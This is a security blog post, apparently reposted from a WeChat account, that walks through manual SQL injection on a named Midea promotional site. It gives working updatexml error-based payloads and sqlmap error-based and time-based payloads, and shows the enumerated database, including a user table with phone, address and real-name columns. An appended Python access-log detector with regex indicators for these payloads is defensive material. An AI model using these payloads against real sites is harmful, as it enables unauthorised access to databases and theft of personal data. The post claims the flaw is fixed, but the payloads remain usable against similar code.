http://act.midea.com/kt30year/site/action.php?act=like&class='
Entering a single quote (') in the class parameter produces an error.
Let's start the injection. Today I'll demonstrate manual injection so you can see exactly how SQL injection works, rather than relying on tools for once.
I'm using updatexml error-based injection.
http://act.midea.com/kt30year/site/action.php?act=like&class=%27or%20updatexml(1,concat(0x7e,version(),user(),database()),1)or%27
XPATH syntax error: '~kt30year'
Retrieving the database user, database version and database name.
http://act.midea.com/kt30year/site/action.php?act=like&class='or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0)or'
XPATH syntax error: '~hy_draw'
Retrieving the table names of the current database.
http://act.midea.com/kt30year/site/action.php?act=like&class=%27or%20updatexml(3,concat(0x7e,(SELECT%20concat(column_name)%20FROM%20information_schema.columns%20WHERE%20table_name=0x7573725F67656E6572616C%20limit%200,1)),4)or%27
XPATH syntax error: '~id'
This retrieves the column names of a table (0x7573725F67656E6572616C is the hex form of the table name usr_general).
Below is the POC from my sqlmap run against the same parameter, for comparison:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: class (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: act=like&class=' AND (SELECT 4469 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(4469=4469,1))),0x7178626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ynoa'='ynoa
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: act=like&class=' OR SLEEP(10) AND 'qTrY'='qTrY
    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[23:57:35] [INFO] testing MySQL
[23:57:35] [DEBUG] performed 0 queries in 0.01 seconds
[23:57:35] [INFO] confirming MySQL
[23:57:35] [DEBUG] performed 0 queries in 0.00 seconds
[23:57:35] [DEBUG] performed 0 queries in 0.00 seconds
[23:57:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[23:57:35] [INFO] fetching current user
[23:57:35] [INFO] resumed: kt30year@localhost
[23:57:35] [DEBUG] performed 0 queries in 0.00 seconds
current user: 'kt30year@localhost'
available databases [3]:
[*] information_schema
[*] kt30year
[*] test
Database: kt30year
Table: usr_general
[18 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| address        | varchar(255)        |
| award          | tinyint(3) unsigned |
| id             | int(11) unsigned    |
| logintime      | datetime            |
| phone          | varchar(50)         |
| realname       | varchar(50)         |
| regtime        | datetime            |
| snsavatarlarge | varchar(200)        |
| snsfollowernum | int(15)             |
| snsfriendsnum  | int(15)             |
| snsgender      | varchar(4)          |
| snsid          | int(4)              |
| snslocation    | varchar(30)         |
| snsname        | varchar(30)         |
| snsnick        | varchar(30)         |
| snsstatusesnum | int(15)             |
| snsuid         | varchar(100)        |
| snsurl         | varchar(200)        |
+----------------+---------------------+
Database: kt30year
Table: hy_home
[3 columns]
+--------+------------------+
| Column | Type             |
+--------+------------------+
| value  | varchar(100)     |
| id     | int(10) unsigned |
| name   | varchar(100)     |
+--------+------------------+
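The three payload shapes shown in this write-up (the manual updatexml() error extraction, sqlmap's FLOOR(RAND()) error-based vector and its SLEEP() time-based vector) all pass through the web server's access log, which makes them straightforward to spot after the fact. The following Python script is an added example and is not code from the original post or from the site it describes: it parses combined-format access-log lines, URL-decodes every query parameter and tags values that match those shapes. The log lines, the TEST-NET client IP, the date and the indicator list are constructed for this example; only the request path and the parameter names are taken from the post. Treat the indicator list as a starting point for a WAF or SIEM rule, not as a substitute for the actual fix, which is a prepared statement for the class parameter and never returning raw MySQL errors (the XPATH syntax error lines above) to the client.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicator patterns, applied to each URL-decoded, lower-cased parameter value.
# They mirror the payload shapes in this write-up: updatexml()-based error
# extraction, sqlmap's FLOOR(RAND()) GROUP BY error trick, SLEEP()-based blind
# probes, information_schema enumeration and the quote-then-OR/AND breakout.
INDICATORS = [
    ("xml-error-based", re.compile(r"\b(updatexml|extractvalue)\s*\(")),
    ("floor-rand-error-based", re.compile(r"floor\s*\(\s*rand\s*\(")),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(")),
    ("schema-enumeration", re.compile(r"information_schema\.")),
    ("quote-breakout", re.compile(r"'\s*(or|and)\b")),
]

# Apache/Nginx "combined" access log: ip ident user [ts] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_params(request_target):
    """Return (name, value) pairs from the query string, fully URL-decoded.

    parse_qsl decodes one layer; the extra unquote_plus also catches
    double-encoded payloads (%2527 -> %27 -> '). A detector wants to decode
    twice even though the application itself decodes only once.
    """
    query = urlsplit(request_target).query
    return [(k, unquote_plus(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def classify_value(value):
    """Names of the indicators that match one parameter value (empty if clean)."""
    low = value.lower()
    return [name for name, rx in INDICATORS if rx.search(low)]


def scan_line(line):
    """Parse one access-log line; return a finding dict, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; skip rather than guess
    hits = {}
    for name, value in decode_params(m.group("path")):
        tags = classify_value(value)
        if tags:
            hits[name] = tags
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
        "params": hits,
    }


def scan_log(lines):
    """All findings for an iterable of log lines, in log order."""
    return [f for f in (scan_line(line) for line in lines) if f]


# Constructed sample log (placeholder client IP from TEST-NET-3, placeholder date).
# Line 1 is a benign request; lines 2-4 carry, URL-encoded, the three payload
# shapes quoted in this write-up (manual updatexml, sqlmap FLOOR/RAND, sqlmap SLEEP).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2000:23:57:30 +0800] "GET /kt30year/site/action.php?act=like&class=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2000:23:57:31 +0800] "GET /kt30year/site/action.php?act=like&class=%27or%20updatexml(1,concat(0x7e,version(),user(),database()),1)or%27 HTTP/1.1" 200 214 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2000:23:57:35 +0800] "GET /kt30year/site/action.php?act=like&class=%27%20AND%20(SELECT%204469%20FROM(SELECT%20COUNT(*),CONCAT(0x7178787671,(SELECT%20(ELT(4469=4469,1))),0x7178626a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27ynoa%27=%27ynoa HTTP/1.1" 200 214 "-" "sqlmap/1.0"',
    '203.0.113.5 - - [01/Jan/2000:23:57:48 +0800] "GET /kt30year/site/action.php?act=like&class=%27%20OR%20SLEEP(10)%20AND%20%27qTrY%27=%27qTrY HTTP/1.1" 200 512 "-" "sqlmap/1.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["time"], finding["ip"], finding["path"], finding["params"])
```

Run as a script it prints one line per flagged request; feed real log lines into scan_log() instead of SAMPLE_LOG. The quote-breakout pattern is deliberately narrow (a quote immediately followed by OR/AND) so that ordinary values containing an apostrophe are not flagged; values that only contain a bare quote, like the first request in the post, are left to the application's own error handling.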
This vulnerability has already been fixed; please do not use this for illegal purposes. Thanks~~
This article was first published on the WeChat public account 飓风网络安全 (Hurricane Network Security) under the title "美的某站sql手工注入案例" (A manual SQL injection case on a Midea site).